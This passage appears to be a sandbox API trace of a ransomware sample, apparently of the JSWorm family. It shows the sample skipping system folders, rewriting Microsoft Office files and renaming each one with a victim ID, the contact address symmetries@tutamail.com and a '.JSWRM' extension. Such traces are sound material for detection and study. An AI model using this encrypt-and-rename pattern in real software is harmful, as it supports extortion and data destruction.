cAlternateFileName="OFFICE~4.MCX")) returned 1 [0112.382] lstrcmpiW (lpString1="office32mui.msi.16_office32mui.mcxml", lpString2=".") returned 1 [0112.382] lstrcmpiW (lpString1="office32mui.msi.16_office32mui.mcxml", lpString2="..") returned 1 [0112.382] lstrcmpiW (lpString1="office32mui.msi.16_office32mui.mcxml", lpString2="...") returned 1 [0112.383] lstrcmpiW (lpString1="office32mui.msi.16_office32mui.mcxml", lpString2="windows") returned -1 [0112.383] lstrcmpiW (lpString1="office32mui.msi.16_office32mui.mcxml", lpString2="recovery") returned -1 [0112.383] lstrcmpiW (lpString1="office32mui.msi.16_office32mui.mcxml", lpString2="perflogs") returned -1 [0112.383] lstrcmpiW (lpString1="office32mui.msi.16_office32mui.mcxml", lpString2="documents and settings") returned 1 [0112.383] lstrcmpiW (lpString1="office32mui.msi.16_office32mui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.383] lstrcmpiW (lpString1="office32mui.msi.16_office32mui.mcxml", lpString2="system volume information") returned -1 [0112.383] lstrcmpiW (lpString1="office32mui.msi.16_office32mui.mcxml", lpString2="msocache") returned 1 [0112.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0112.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32mui.msi.16_office32mui.mcxml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0112.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32mui.msi.16_office32mui.mcxml", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="office32mui.msi.16_office32mui.mcxml", lpUsedDefaultChar=0x0) returned 36 [0112.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0112.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0112.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32mui.msi.16_office32mui.mcxml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0112.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32mui.msi.16_office32mui.mcxml", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="office32mui.msi.16_office32mui.mcxml", lpUsedDefaultChar=0x0) returned 36 [0112.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0112.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0112.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0112.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0112.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\office32mui.msi.16_office32mui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\office32mui.msi.16_office32mui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.384] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=72384) returned 1 [0112.384] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11ac0) returned 0x24c1d0 [0112.385] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x11ac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x11ac0, lpOverlapped=0x0) returned 1 [0112.395] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.395] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x11ac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x11ac0, lpOverlapped=0x0) returned 1 [0112.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.396] CloseHandle (hObject=0x238) returned 1 [0112.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0112.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0112.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0112.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0112.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0112.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0112.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.396] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\office32mui.msi.16_office32mui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\office32mui.msi.16_office32mui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\office32mui.msi.16_office32mui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\office32mui.msi.16_office32mui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0112.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0112.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0112.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.398] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9888767, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9888767, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9888767, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d8, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="officemui.msi.16_AppXManifestLoc.mcxml", cAlternateFileName="OFFICE~3.MCX")) returned 1 [0112.398] lstrcmpiW (lpString1="officemui.msi.16_AppXManifestLoc.mcxml", lpString2=".") returned 1 [0112.398] lstrcmpiW (lpString1="officemui.msi.16_AppXManifestLoc.mcxml", lpString2="..") returned 1 [0112.398] lstrcmpiW (lpString1="officemui.msi.16_AppXManifestLoc.mcxml", lpString2="...") returned 1 [0112.398] lstrcmpiW (lpString1="officemui.msi.16_AppXManifestLoc.mcxml", lpString2="windows") returned -1 [0112.398] lstrcmpiW (lpString1="officemui.msi.16_AppXManifestLoc.mcxml", lpString2="recovery") returned -1 [0112.398] lstrcmpiW (lpString1="officemui.msi.16_AppXManifestLoc.mcxml", lpString2="perflogs") returned -1 [0112.398] lstrcmpiW (lpString1="officemui.msi.16_AppXManifestLoc.mcxml", lpString2="documents and settings") returned 1 [0112.398] lstrcmpiW (lpString1="officemui.msi.16_AppXManifestLoc.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.398] lstrcmpiW (lpString1="officemui.msi.16_AppXManifestLoc.mcxml", lpString2="system volume information") returned -1 [0112.398] lstrcmpiW (lpString1="officemui.msi.16_AppXManifestLoc.mcxml", lpString2="msocache") returned 1 [0112.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0112.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_AppXManifestLoc.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0112.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_AppXManifestLoc.mcxml", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officemui.msi.16_AppXManifestLoc.mcxml", lpUsedDefaultChar=0x0) returned 38 [0112.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0112.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0112.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_AppXManifestLoc.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0112.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_AppXManifestLoc.mcxml", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officemui.msi.16_AppXManifestLoc.mcxml", lpUsedDefaultChar=0x0) returned 38 [0112.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0112.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0112.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0112.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0112.398] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_AppXManifestLoc.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_appxmanifestloc.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.399] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=472) returned 1 [0112.399] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d0) returned 0x1ef508 [0112.400] ReadFile (in: hFile=0x238, lpBuffer=0x1ef508, nNumberOfBytesToRead=0x1d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1ef508*, lpNumberOfBytesRead=0x345e89c*=0x1d0, lpOverlapped=0x0) returned 1 [0112.400] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.400] WriteFile (in: hFile=0x238, lpBuffer=0x1ef508*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1ef508*, lpNumberOfBytesWritten=0x345e898*=0x1d0, lpOverlapped=0x0) returned 1 [0112.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef508 | out: hHeap=0x1e0000) returned 1 [0112.401] CloseHandle (hObject=0x238) returned 1 [0112.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0112.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0112.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0112.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0112.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0112.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0112.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.401] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_AppXManifestLoc.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_appxmanifestloc.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_AppXManifestLoc.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_appxmanifestloc.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0112.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0112.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0112.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.403] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9888767, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9888767, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9888767, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x659ca, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="officemui.msi.16_officemui.mcxml", cAlternateFileName="OFFICE~2.MCX")) returned 1 [0112.403] lstrcmpiW (lpString1="officemui.msi.16_officemui.mcxml", lpString2=".") returned 1 [0112.403] lstrcmpiW (lpString1="officemui.msi.16_officemui.mcxml", lpString2="..") returned 1 [0112.403] lstrcmpiW (lpString1="officemui.msi.16_officemui.mcxml", lpString2="...") returned 1 [0112.403] lstrcmpiW (lpString1="officemui.msi.16_officemui.mcxml", lpString2="windows") returned -1 [0112.403] lstrcmpiW (lpString1="officemui.msi.16_officemui.mcxml", lpString2="recovery") returned -1 [0112.416] lstrcmpiW (lpString1="officemui.msi.16_officemui.mcxml", lpString2="perflogs") returned -1 [0112.417] lstrcmpiW (lpString1="officemui.msi.16_officemui.mcxml", lpString2="documents and settings") returned 1 [0112.417] lstrcmpiW (lpString1="officemui.msi.16_officemui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.417] lstrcmpiW (lpString1="officemui.msi.16_officemui.mcxml", lpString2="system volume information") returned -1 [0112.417] lstrcmpiW (lpString1="officemui.msi.16_officemui.mcxml", lpString2="msocache") returned 1 [0112.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0112.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_officemui.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_officemui.mcxml", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officemui.msi.16_officemui.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0112.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0112.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_officemui.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="officemui.msi.16_officemui.mcxml", cchWideChar=32, lpMultiByteStr=0x22d0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="officemui.msi.16_officemui.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0112.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0112.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0112.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0112.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_officemui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_officemui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.418] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=416202) returned 1 [0112.418] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0112.419] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0112.434] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.434] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0112.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.435] CloseHandle (hObject=0x238) returned 1 [0112.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0112.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0112.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0112.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0112.435] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0112.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0112.435] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.436] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_officemui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_officemui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\officemui.msi.16_officemui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\officemui.msi.16_officemui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0112.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0112.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0112.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 